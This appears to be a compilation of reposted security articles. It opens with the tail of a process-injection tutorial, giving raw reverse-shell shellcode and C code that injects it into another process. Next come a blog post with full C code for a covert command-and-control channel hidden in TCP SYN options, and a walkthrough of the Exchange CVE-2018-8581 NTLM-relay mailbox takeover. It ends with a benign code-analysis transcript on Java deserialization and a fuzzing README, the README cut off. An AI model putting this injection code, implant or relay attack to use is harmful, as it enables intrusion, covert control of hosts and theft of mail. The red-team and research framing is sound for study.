"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x01\xbb\x0a\x00\x00\x05\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5"; myNtCreateSection fNtCreateSection = (myNtCreateSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtCreateSection")); myNtMapViewOfSection fNtMapViewOfSection = (myNtMapViewOfSection)(GetProcAddress(GetModuleHandleA("ntdll"), "NtMapViewOfSection")); myRtlCreateUserThread fRtlCreateUserThread = (myRtlCreateUserThread)(GetProcAddress(GetModuleHandleA("ntdll"), "RtlCreateUserThread")); SIZE_T size = 4096; LARGE_INTEGER sectionSize = { size }; HANDLE sectionHandle = NULL; PVOID localSectionAddress = NULL, remoteSectionAddress = NULL; // create a memory section fNtCreateSection(§ionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)§ionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL); // create a view of the memory section in the local process fNtMapViewOfSection(sectionHandle, GetCurrentProcess(), &localSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_READWRITE); // create a view of the memory section in the target process HANDLE targetHandle = OpenProcess(PROCESS_ALL_ACCESS, false, 1480); fNtMapViewOfSection(sectionHandle, targetHandle, &remoteSectionAddress, NULL, NULL, NULL, &size, 2, NULL, PAGE_EXECUTE_READ); // copy shellcode to the local view, which will get reflected in the target process's mapped view memcpy(localSectionAddress, buf, sizeof(buf)); HANDLE targetThreadHandle = NULL; fRtlCreateUserThread(targetHandle, NULL, FALSE, 0, 0, 0, remoteSectionAddress, NULL, &targetThreadHandle, NULL); return 0; } References NTAPI Undocumented 
References

NTAPI Undocumented Functions - undocumented.ntinternals.net
Section Objects and Views (Windows drivers) - docs.microsoft.com

Sursa: https://ired.team/offensive-security/code-injection-process-injection/ntcreatesection-+-ntmapviewofsection-code-injection
-
Command and Control via TCP Handshake

thesw4rm
Cybersecurity Stuff
2019-09-15 (Updated: 2019-09-15)
C2, Linux, NFQueue, Netfilter, TCP

Quick Intro/Disclaimer

This is my first blog post, so please let me know if there's any way I can improve it. I expect it to have inaccuracies and maybe parts that can be explained better. I would appreciate a quick note if any of you notice them! So, all that BS aside, let's get into it.

Quick disclaimer: the method presented here probably doesn't have as much use or application in a real red teaming scenario. The main reason: you need to have root on the victim machine at some point for it to even work, although after having it once you can configure the victim system so it is not necessary again. I wrote this primarily because I thought it was a cool and creative way to exfiltrate or infiltrate data with hilarious stealth.

Background

Command and control is pretty widely known across the security world. You set up a listener on a victim machine and send commands to it that it then executes, hopefully with root. People have a lot of creative ways to hide the commands that are sent: Cobalt Strike uses timed delays with its beacons, Wireguard can be used to encrypt data while it is being transferred, etc. However, the problem with all these approaches is that anyone (or anything) that's monitoring data transfer at the right time and place has the potential to catch these threats. But who the hell looks so closely at SYN packets?

Initial Info

If you know the structure of an IPv4 or TCP packet, or are OK with checking back to see what part of the packet I'm talking about, skip ahead.

IPv4 packets are structured as shown in this image. TCP packets are structured as shown in this image.

Not much space to hide any data. That makes perfect sense, because handshake packets are meant to establish a connection and define parameters for it, not send data themselves. Much of the packet is pre-defined or will cause problems with the connection if changed, like port, flags, etc. The sequence number can encode 4 bytes of data at a time to infiltrate data, but this isn't good enough. 4 bytes per second might be acceptable for RCE to a server on the Moon in 1969, but we need something that can at least carry the equivalent of a full sentence in English.

Meet: the options field. TCP options are absolutely vital in modern day connections. They are what define how data will be transferred from one endpoint to the other. The entire TCP header can be at most 60 bytes, so there's a whopping 40 bytes of space available in TCP options. Ten times more than what we just saw! We will actually be able to go beyond this in the test environment and the packet will still be accepted. Through research online, I found that the 40-byte limit is for packets that need to be legit. In practice, an extra long TCP options portion will only be truncated if the packet is re-segmented when it goes through one of its hops. A firewall would (I assume) need to have the header-size limit hardcoded and ignore the Total Length portion of the IPv4 header in order to truncate all the values. However, for the purpose of this experiment we are gonna assume that doesn't happen and the packet is sent through as it is.

In order to add options to the TCP packet, we need to update the "Data Offset" field, which lists the number of 32-bit words in the TCP header.
The base TCP header is 5 words (20 bytes / 4 bytes per word = 5), and the Data Offset field is 4 bits, so a spec-compliant header tops out at 15 words (60 bytes), i.e. the 40 bytes of options we saw above. If only the IPv4 Total Length field mattered, we could tack on a THICC ~1KB of extra data; in practice, anything past the 40-byte mark rides on the no-resegmentation assumption from earlier. Either way, it's more than enough for a couple of commands. In addition, although we won't mess with this in the experimental setup, there is an experimental option that IANA has acknowledged that lets you extend the Data Offset portion by even more. Here's a link for those that want to read more into it.

NFQueue

Netfilter created a plugin called NFQueue for iptables to bridge the gap between intercepting packets in the kernel and being able to modify and read them from your own program in userspace. It relies on the libnetfilter_queue library and (initially) root access, which sucks, but it won't stop us. For now, everything will be done through root, but for future work any user with CAP_NET_ADMIN capabilities on the victim can perform this attack as well.

Back to the topic at hand, NFQueue copies packets from kernel space to userspace for anyone with privileges to mess with them and then give a verdict. This verdict could be your everyday ACCEPT, REJECT, DROP, or one of the special NF_REPEAT or NF_QUEUE, which either reinserts the modified packet back into the queue or sends it to a different NFQueue listener. Enough talk. Time to code.

Building the test environment

The test environment I set up is two Ubuntu 18.04 LTS server VMs, each with the libnetfilter-queue-dev dependencies installed. I refer to one as the listener (the victim machine) and the other as the controller (the attacking machine).

Writing the code

I will be going over how the code actually works. If you just wanna see Wireshark pictures and the result, skip ahead to the screenshots.

Some stupid college kid boiled some plates

NFQueue needs a big chunk of boilerplate code to get started. No one wants to write all that code themselves, so neither will we. The boilerplate I have made for us is a heavily modified version of the Hello World found here.

Initial commit for the controller can be found here. Initial commit for the listener can be found here.

Breaking down the boilerplate

Lots of code here, let's go over it real quick.

tcp_pkt_struct.h

#pragma pack(push, 1)
typedef struct {
    struct iphdr ipv4_header;
    struct tcphdr tcp_header;
} full_tcp_pkt_t;
#pragma pack(pop)

This is what we will use to modify packet headers. NFQueue just gives us a void array of bytes; it's up to us to figure out what to do with it. Notice struct iphdr and struct tcphdr are directly from the Linux networking library.

main.c

We will treat three functions as a black box (we know what they do but not how they do it). Mostly because I found them on Google and actually have no idea how they work.

long ipcsum(unsigned char *buf, int length);
void tcpcsum(struct iphdr *pIph, unsigned short *ipPayload);
void rev(void *start, int size);

ipcsum and tcpcsum calculate the checksum of an IPv4 and TCP packet. rev reverses the bytes starting at the passed-in pointer for size number of bytes, so 01 02 03 will become 03 02 01. We will use this to fight the battle between the different endians of network byte order and Linux byte order.

Now let's look at the non-blackbox functions.

int main();
static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, ...);
static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len);

The main function loads packets from the sk_buff and writes them into a statically allocated 4098-byte buffer. 4098 is overkill for SYN packets.
Change it if you want; you don't have to for experimental purposes. cb is the callback that handles each packet as it enters the sk_buff, and modify_handshk_pkt will modify or read the packet as needed.

Plan of attack

Let's take a look at a SYN packet in Wireshark to see what we are working with. I ran a simple web server on port 8000 on the listener:

python3 -m http.server &

Curl the server from the controller, and let's look at what Wireshark shows (filtered for just SYN packets).

Analysis

The portion that is highlighted in white, 02 04 05 b4, is where the TCP options start. TCP options are placed one after another in the format Option-Kind (1 byte), Option-Length (1 byte), Option-Value (Length - 2 bytes). The option length defines the length of ALL bytes in the option, including the bytes used for the kind and length itself. In this case, 02 represents the Maximum Segment Size, has a length of 04, and a value of 05b4.

Notice "Header Length: 40 bytes" further up in Wireshark's description of the packet. This is a converted form of the Data Offset field. So in order to add options at the end, we will need to update the Total Length in the IPv4 packet (look back if you don't remember) and the Data Offset with as many 32-bit words as are in our options. This also means that the total length of everything we add to the packet has to be a multiple of 4 (you can't have a fractional Data Offset). We can pad the packet with 01, or No-Op, for this purpose.

The Storm of Code - Controller

The legit way to add extra data to the TCP packet would be to use an experimental option. However, we want to hide, so let's use an option that will be very common, like User Timeout (0x1c or 28). IANA has a list of option assignments on their page. So let's add to the code.

tcp_pkt_struct.h

Insert code at the top:

#define METADATA_SIZE 16

#pragma pack(push, 1)
typedef struct {
    uint16_t padding;
    uint8_t opt;
    uint8_t len;
    uint32_t payload;
    uint32_t payload_2;
    uint32_t payload_3;
} pkt_meta;
#pragma pack(pop)
...

The option has a kind, a length, and a payload, which is a string we will write to a file on the victim. The padding at the beginning is there to keep the total length divisible by 4. Because the data will be appended directly to the packet, we cannot use an array and need to split the payload into chunks of 4 bytes.

main.c

static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len) {
    /* Should match only SYN packets */
    printf("\nPacket intercepted: \n");
    if (pkt->tcp_header.syn == 1 && pkt->tcp_header.ack == 0) {
        printf("\tPacket type: SYN\n");
        pkt_meta *metadata = (pkt_meta *)((unsigned char *)pkt + pkt_len);
        metadata->padding = 0x0101;
        metadata->opt = 0x1c; // Custom option kind. 28 = User Timeout
        metadata->len = METADATA_SIZE - sizeof(metadata->padding); // Custom option length. Default length of User Timeout is different.
        pkt->tcp_header.doff += METADATA_SIZE / 4; // Change data offset
    }
}

We added in all the code relevant to the TCP packet. At the end, we change the data offset to reflect the additional options.
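To sanity-check that layout outside of C, here is a small, hedged Python sketch (illustration only, not part of the controller code) that packs the same 16-byte blob pkt_meta describes: two No-Op padding bytes, the kind, the length, and 12 bytes of payload.

import struct

def pack_metadata(payload: bytes) -> bytes:
    payload = payload.ljust(12, b"\x00")[:12]   # the three uint32_t payload fields
    # 0x01 0x01 = No-Op padding, 0x1c = User Timeout, length covers kind+len+payload
    return struct.pack("BBBB", 0x01, 0x01, 0x1c, 2 + len(payload)) + payload

blob = pack_metadata(b"exfil data")
assert len(blob) == 16 and len(blob) % 4 == 0   # keeps the Data Offset a whole number
print(blob.hex())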
Let's move onto the callback, where the packet is finally sent on its way.

static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, void *data)
{
    u_int32_t id;
    struct nfqnl_msg_packet_hdr *ph;
    ph = nfq_get_msg_packet_hdr(nfa);
    id = ntohl(ph->packet_id);
    printf("entering callback\n");

    full_tcp_pkt_t *ipv4_payload = NULL;
    int pkt_len = nfq_get_payload(nfa, (unsigned char **) &ipv4_payload);

    modify_handshk_pkt(ipv4_payload, pkt_len);

    rev(&ipv4_payload->ipv4_header.tot_len, 2);
    ipv4_payload->ipv4_header.tot_len += METADATA_SIZE;
    rev(&ipv4_payload->ipv4_header.tot_len, 2);

    ipv4_payload->ipv4_header.check = 0;
    ipv4_payload->ipv4_header.check = ipcsum((unsigned char *)&ipv4_payload->ipv4_header, 20);
    rev(&ipv4_payload->ipv4_header.check, 2); // Convert between endians

    tcpcsum(&ipv4_payload->ipv4_header, (unsigned short *)&ipv4_payload->tcp_header);

    int ret = nfq_set_verdict(qh, id, NF_ACCEPT, (u_int32_t) pkt_len + METADATA_SIZE, (void *) ipv4_payload);
    printf("\n Set verdict status: %s\n", strerror(errno));
    return ret;
}

We extend the total length of the IPv4 packet so the TCP packet doesn't get truncated on its way to the destination. The Linux system I was using got confused between its preferred Little Endian and the network packet's Big Endian, so I had to reverse the bytes first, add the length, and reverse the bytes again. This may not be the case for you; you can confirm it by seeing if the total length increases by 0x0010 bytes or by 0x1000 bytes. We then recalculate the IP and TCP checksums, reversing the bytes as necessary. (Normally packets don't need a valid TCP checksum, but let's put it there anyway.)

Fruit of labour

Let's see the result of our work. Make a build folder and build the entire project using CMake, then upload to the controller. There's an iptables rule in iptables_rules.sh that intercepts SYN packets on port 8000 and sends them to queue 0. If nothing is listening on queue 0, it simply sends the SYN on its way.

Steps:
1) Create build folder and build project
2) Upload build folder and iptables_rules.sh file to controller
3) Run iptables_rules.sh as root on controller (only if the system was restarted or this is the first upload)
4) Run main in the build folder as root on controller
5) Start up Wireshark on listener, filtering on packets on port 8000, to view the result (to make sure it was received)
6) Send HTTP request from controller to listener on port 8000

Controller Screenshot

Controller Wireshark

Awesome! The SYN packet in that whole HTTP request has our data added to the end. No kernel programming necessary. Notice that the User Timeout option is supposed to be 4 bytes and we set it to 14. If you want to be extra stealthy you can use multiple options and break your payload into their individual default lengths so there isn't an anomaly. For this experiment, we don't care.

The Storm of Code - Listener

Cool, we modified a packet from the controller. Big whoop. But now we have to do something with that payload. The code in the listener is the exact same for the boilerplate and tcp_pkt_struct.h, so refer back if you forgot about them. Let's go right into main.c.
main.c

int write_to_file(unsigned char *payload, int len) {
    int output_fd;
    ssize_t ret_out;
    output_fd = open("virusfile.pup", O_WRONLY | O_CREAT, 0644);
    if (output_fd == -1) {
        perror("open virus file");
        return 3;
    }
    ret_out = write(output_fd, payload, len);
    close(output_fd);
    return 0;
}

static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len) {
    /* Should match only SYN packets */
    printf("\nPacket intercepted: \n");
    if (pkt->tcp_header.syn == 1 && pkt->tcp_header.ack == 0) {
        printf("\tPacket type: SYN\n");
        pkt_meta *metadata = (pkt_meta *)((unsigned char *)pkt + pkt_len - METADATA_SIZE);
        unsigned char *payload = (unsigned char *)(&metadata->payload);
        write_to_file(payload, METADATA_SIZE - (sizeof(metadata->padding) + sizeof(metadata->opt) + sizeof(metadata->len)));
        printf("RECEIVED PAYLOAD: %s", payload);
        pkt->tcp_header.doff -= METADATA_SIZE / 4;
    }
}

We basically do the opposite of what we did in the controller when reading the packet. The metadata pointer has to sit METADATA_SIZE bytes before the end of the received packet (i.e., right after the original packet contents), and instead of writing to the metadata we read from it. Then we write the payload to a file and reduce the Data Offset back to its initial value.

static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, void *data)
{
    u_int32_t id;
    struct nfqnl_msg_packet_hdr *ph;
    ph = nfq_get_msg_packet_hdr(nfa);
    id = ntohl(ph->packet_id);
    printf("entering callback\n");

    full_tcp_pkt_t *ipv4_payload = NULL;
    int pkt_len = nfq_get_payload(nfa, (unsigned char **) &ipv4_payload);

    modify_handshk_pkt(ipv4_payload, pkt_len);

    rev(&ipv4_payload->ipv4_header.tot_len, 2);
    ipv4_payload->ipv4_header.tot_len -= METADATA_SIZE;
    rev(&ipv4_payload->ipv4_header.tot_len, 2);

    ipv4_payload->ipv4_header.check = 0;
    ipv4_payload->ipv4_header.check = ipcsum((unsigned char *)&ipv4_payload->ipv4_header, 20);
    rev(&ipv4_payload->ipv4_header.check, 2); // Convert between endians

    tcpcsum(&ipv4_payload->ipv4_header, (unsigned short *)&ipv4_payload->tcp_header);

    int ret = nfq_set_verdict(qh, id, NF_ACCEPT, (u_int32_t) pkt_len - METADATA_SIZE, (void *) ipv4_payload);
    printf("\n Set verdict status: %s\n", strerror(errno));
    return ret;
}

Again, we are just reversing what we did earlier: reducing the total length, recalculating the checksums, and truncating the packet bytes sent out by the libnetfilter_queue library.

Proving it worked

Let's look at some screenshots to see that it worked.

Steps to build:
1) Build the project as shown for the controller
2) Note that iptables_rules.sh captures on PREROUTING and not POSTROUTING to intercept packets coming into the system. Upload and run the iptables scripts as shown for the controller.
3) Use iptables_clean.sh if you mess up (note that it flushes a ton of rules because I'm lazy) or remove the rule manually and try again
4) Run the server executable in the build directory on the listener

Listener packet interception

Cool! We intercepted the SYN packet coming in and received the payload. Let's make sure we could write it to a file (you can do anything you want with the payload once you have it).

Listener file contents

And there you go. The payload was intercepted, the packet was truncated (although I couldn't find a screenshot to prove that, you can see for yourself if you run it), and no one is the wiser.
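If you would rather see the smuggled options for yourself than trust a missing screenshot, a few lines of Python on the listener (assuming scapy is installed, and keeping in mind that sniffing happens on the wire, before the NFQueue handler strips the packet) will print the options of every inbound SYN on port 8000:

from scapy.all import sniff, TCP

def show_options(pkt):
    tcp = pkt[TCP]
    if tcp.flags.S and not tcp.flags.A:   # SYN set, ACK clear
        print(tcp.options)                # the smuggled option shows up as kind 28

sniff(filter="tcp dst port 8000", lfilter=lambda p: TCP in p,
      prn=show_options, store=False)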
The firewall doesn’t have the resources to read the options of every single SYN packet coming in, especially when it’s a large scale environment with lots of inbounds connections, and the endpoint is none the wiser. Conclusions This is just a Hello World example of what can be done with NFQueue from a red teaming perspective during post-exploitation. The easiest way to hide something in network traffic is to hide in numbers, and we have done just that. There isn’t anything more common than an incoming SYN packet to a server. However, this method does require root privileges on the victim system or CAP_NET_ADMIN capabilities for a compromised user. Additionally, the libnetfilter_queue dependency must be installed on the victim, meaning that for now this method will only work on systems with netfilter and the NFQueue extension installed (so far I could only find it working on Linux). It can also work on BSD systems using divert sockets but I have not tried that, although as per documentation there are similar limitations as to the Linux method. I plan to find a way to hide the payload better within TCP options by researching more into default lengths and commonly used option kinds. Additionally, I’m trying to construct an environment where the TCP packet is re-segmented and possibly truncated if the handshake packet is more than 60 bytes. Future learning This is my first time making a blog post. Please contact me at thesw4rm@pm.me if you want to discuss anything tech based with me. Definitely please let me know of anything that can be improved, if this method is actually applicable in a real engagement, or anyway I can improve it so it becomes that way. Peace guys! Sursa: https://thesw4rm.gitlab.io/nfqueue_c2/2019/09/15/Command-and-Control-via-TCP-Handshake/
-
Microsoft Exchange – Privilege Escalation

September 16, 2019 | Administrator | Red Team | CVE-2018-8581, Microsoft Exchange, NTLM Relay, Privilege Escalation, PushSubscription

Harvesting the credentials of a domain user during a red team operation can lead to execution of arbitrary code, persistence and domain escalation. However, information stored in emails can be highly sensitive for an organisation, and therefore threat actors may focus on exfiltrating data from mailboxes. This can be achieved either by adding a rule to the mailbox of a target user that will forward emails to an inbox the attacker controls, or by delegating access to a mailbox to their Exchange account.

Dustin Childs from the Zero Day Initiative discovered a vulnerability in Microsoft Exchange that could allow an attacker to impersonate a target account. This vulnerability exists because, by design, Microsoft Exchange allows any user to specify a URL for a Push Subscription, and Exchange will send notifications to this URL. NTLM credentials are leaked in the process and can be used to authenticate with Exchange Web Services via NTLM relay. The technical details of the vulnerability have been covered on the Zero Day Initiative blog.

Email Forwarding

Accessing the compromised account from the Outlook Web Access (OWA) portal and selecting the permissions of the inbox folder will open a new window that contains the permissions of the mailbox.

Inbox Permissions

The target account should be added to have permissions over the mailbox. This is required in order to retrieve the SID (Security Identifier) of the account.

Add Permissions for the Target Account

Opening the Network console in the browser and browsing a mailbox folder will generate a request that will be sent to the Microsoft Exchange server.

POST Request to Microsoft Exchange

Examining the HTTP response of the request will unveil the SID of the Administrator account.

Administrator SID

The implementation of this attack requires two Python scripts from the Zero Day Initiative GitHub repository. The serverHTTP_relayNTLM.py script requires the SID of the Administrator that has been retrieved, the IP address of the Exchange server with the target port, and the email account that has been compromised and is in the control of the red team.

Configuration serverHTTP_relayNTLM script

Once the script has the correct values it can be executed in order to start a relay server.

python serverHTTP_relayNTLM.py

Relay Server

The Exch_EWS_pushSubscribe.py script requires the domain credentials and domain of the compromised account and the IP address of the relay server.

Push Subscribe Script Configuration

Executing the Python script will attempt to send the pushSubscribe requests to Exchange via EWS (Exchange Web Services).

python Exch_EWS_pushSubscribe.py

pushSubscribe python script

Exchange Response

XML Response

The NTLM hash of the Administrator will be relayed back to the Microsoft Exchange server.

Relay Administrator NTLM

Relay Administrator NTLM to Exchange

Emails that are sent to the mailbox of the target account (Administrator) will be forwarded automatically to the mailbox that is under the control of the red team.

Email to target account

The email will be forwarded to the inbox of the account that the red team controls.

Email forwarded automatically

A rule has been created on the target account, by using NTLM relay to authenticate with Exchange, that will forward all email messages to another inbox.
This can be validated by checking the Inbox rules of the target account.

Rule – Forward Admin Emails

Delegate Access

Microsoft Exchange users can connect their account (Outlook or OWA) to other mailboxes (delegate access) if they have the necessary permissions assigned. Attempting to directly open a mailbox of another account without permissions will produce the following error.

Open Another Mailbox – No Permissions

There is a Python script which exploits the same vulnerability but, instead of adding a forwarding rule, assigns the account permissions to access any mailbox in the domain, including the domain administrator's. The script requires valid credentials, the IP address of the Exchange server and the target email account.

Script Configuration

Executing the Python script will attempt to perform the elevation.

python2 CVE-2018-8581.py

Privilege Escalation Script

Once the script is finished, a message will appear informing the user that the mailbox of the target account can be displayed via Outlook or the Outlook Web Access portal.

Privilege Escalation Script – Delegation Complete

Authentication with Outlook Web Access is needed in order to be able to view the delegated mailbox.

Outlook Web Access Authentication

Outlook Web Access has a functionality which allows an Exchange user to open the mailbox of another account if he has permissions.

Open Another Mailbox

The following window will appear on the screen.

Open Another Mailbox Window

The mailbox of the Administrator will open in another tab to confirm the elevation of privileges.

References

https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
https://github.com/thezdi/PoC/tree/master/CVE-2018-8581
https://github.com/WyAtu/CVE-2018-8581

Sursa: https://pentestlab.blog/2019/09/16/microsoft-exchange-privilege-escalation/
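If you are scripting the earlier SID-retrieval step, a hypothetical Python helper (the file name here is an assumption; the regex matches any standard domain SID) can pull the value out of a saved HTTP response:

import re

body = open("owa_response.txt").read()   # the saved POST response from the Network console
match = re.search(r"S-1-5-21-\d+-\d+-\d+-\d+", body)
if match:
    print("Target SID:", match.group(0))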
-
Finding Insecure Deserialization in Java

By: Semmle Team
September 12, 2019

Video Transcription

Last year, one of our security researchers, Mo, discovered an unsafe deserialization vulnerability in Apache Struts. It turned out to allow remote code execution, and it was also part of the default configuration for Struts, so this was a pretty high impact vulnerability. Today, I'm going to show you how to find unsafe deserialization vulnerabilities using QL.

You can see here that I've got a copy of QL for Eclipse. I have a snapshot of Struts from August last year, which includes the vulnerability, loaded up, and I'm going to walk you through the process of finding that vulnerability with QL.

To start, I'm just going to look for all of the places in the code where we potentially perform deserialization, and I'm interested in calls where the thing that's being called has the name fromXML. We've got two results here, and we can jump to the source code in the snapshot to see that these are both calls to fromXML. Now, this is not necessarily enough for these to be vulnerable. In addition to just doing the deserialization, the user has to be able to control the value that's being passed into fromXML.

This is a pretty typical type of problem. When you're doing variant analysis, you have some value that is potentially user controlled and you want to know if it reaches a dangerous operation. Semmle provides a library that will allow you to do a dataflow analysis. I've just pulled that in with these imports here, and that's what I'm going to use to try and decide, for each of these fromXML calls, whether it is something that's really vulnerable or whether it's okay.

The first thing I need to do is define a dataflow configuration that tells us what the sources are that the user might be able to control, and what the sinks are - in this case, the arguments to fromXML. There's a little bit of boilerplate here while I set this up. Then the information I need to provide is what the sources are, so this is how I do that. We're going to say something is a source if it's a kind of RemoteFlowSource. This is a class that's provided by Semmle; it covers a lot of the standard ways that an end user can control a value in a Java application. This includes things like all of the web server annotations and the sorts of things you'll be familiar with. Of course, if you want to add your own or customize that, you can put whatever you want in here.

Now I'm going to do the same for the sinks. We said earlier that anything that gets passed into fromXML is potentially dangerous, so we say something is a sink if there is a call to fromXML and one of the arguments to that call is our sink.

I've written my configuration and now I can go ahead and actually use that in the query. What I'm going to do here is get the flow config, the path node source, and a path node that is the sink. The only condition I'm going to impose on these is that, under the configuration that I gave, there is a flow from the source to the sink. Then I'm going to return the source, which says where to send the user when they click on this result. I'm additionally going to give the source and the sink, which tells us to provide a bit of context for this result and show how data gets between these two things, and finally a message to display. I can now run that. Okay, that's finished and we've got two results here.
You can see the first one is in test code, so I'll skip over that and we can take a look at the second result here. This is going to be the source: as you can see, request is an HTTP servlet request, and its input stream is something that's likely to be user controlled.

Up here on the right, we've got this Path Explorer. This actually shows us all of the steps that we go through to get from this source to the sink, which is going to be the argument to fromXML. We start with the input stream here; you can see it gets wrapped in a reader there and then passed into this toObject method. We move to the next stage; here we've got the parameter toObject on the XStream handler, and going back again we can see that handler is a content type handler. If you can send a request which is going to be handled by the XStream handler, then you can pass whatever data you want into this fromXML method, and that will allow you to get remote code execution with an appropriately crafted request.

So that shows you how to write a simple query that will find vulnerabilities like this. You can see that it's easy to modify if you have your own sources - maybe you've got a custom web server, something like that - or if you want to customize the sinks, looking for other types of deserialization, it's easy to do that as well. You can tweak this even further, adding things like barriers for sanitization, to really customize it as much as you want and make sure it gives you great results.

Sursa: https://blog.semmle.com/insecure-deserialization-java/
-
JQF + Zest: Semantic Fuzzing for Java

JQF is a feedback-directed fuzz testing platform for Java, which uses the abstraction of property-based testing. JQF is built on top of junit-quickcheck: a tool for generating random arguments for parametric JUnit test methods. JQF enables better input generation using coverage-guided fuzzing algorithms such as Zest.

Zest is an algorithm that biases coverage-guided fuzzing towards producing semantically valid inputs; that is, inputs that satisfy structural and semantic properties while maximizing code coverage. Zest's goal is to find deep semantic bugs that cannot be found by conventional fuzzing tools, which mostly stress error-handling logic only. By default, JQF runs Zest via the simple command: mvn jqf:fuzz.

JQF is a modular framework, supporting the following pluggable fuzzing front-ends called guidances:

Binary fuzzing with AFL (tutorial)
Semantic fuzzing with Zest [ISSTA'19 paper] (tutorial 1) (tutorial 2)
Complexity fuzzing with PerfFuzz [ISSTA'18 paper]

JQF has been successful in discovering a number of bugs in widely used open-source software such as OpenJDK, Apache Maven and the Google Closure Compiler.

Zest Research Paper

To reference Zest in your research, we request you to cite our ISSTA'19 paper:

Rohan Padhye, Caroline Lemieux, Koushik Sen, Mike Papadakis, and Yves Le Traon. 2019. Semantic Fuzzing with Zest. In Proceedings of the 28th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA'19), July 15-19, 2019, Beijing, China. ACM, New York, NY, USA, 12 pages. https://doi.org/10.1145/3293882.3330576

JQF Tool Paper

If you are using the JQF framework to build new fuzzers, we request you to cite our ISSTA'19 tool paper as follows:

Rohan Padhye, Caroline Lemieux, and Koushik Sen. 2019. JQF: Coverage-Guided Property-Based Testing in Java. In Proceedings of the 28th ACM SIGSOFT International Symposium on Software Testing and Analysis (ISSTA '19), July 15-19, 2019, Beijing, China. ACM, New York, NY, USA, 4 pages. https://doi.org/10.1145/3293882.3339002

Overview

What is structured fuzzing?

Binary fuzzing tools like AFL and libFuzzer treat the input as a sequence of bytes. If the test program expects highly structured inputs, such as XML documents or JavaScript programs, then mutating byte arrays often results in syntactically invalid inputs; the core of the test program remains untested. Structured fuzzing tools leverage domain-specific knowledge of the input format to produce inputs that are syntactically valid by construction. Here is a nice article on structure-aware fuzzing of C++ programs using libFuzzer.

What is generator-based fuzzing (QuickCheck)?

Structured fuzzing tools need a way to understand the input structure. Some other tools use declarative specifications of the input format such as context-free grammars or protocol buffers. JQF uses QuickCheck's imperative approach for specifying the space of inputs: arbitrary generator programs whose job is to generate a single random input. A Generator<T> provides a method for producing random instances of type T. For example, a generator for type Calendar returns randomly-generated Calendar objects. One can easily write generators for more complex types, such as XML documents, JavaScript programs, JVM class files, SQL queries, HTTP requests, and many more -- this is generator-based fuzzing. However, simply sampling random inputs of type T is not usually very effective, since the generator does not know if the inputs that it produces are any good.
What is semantic fuzzing (Zest)?

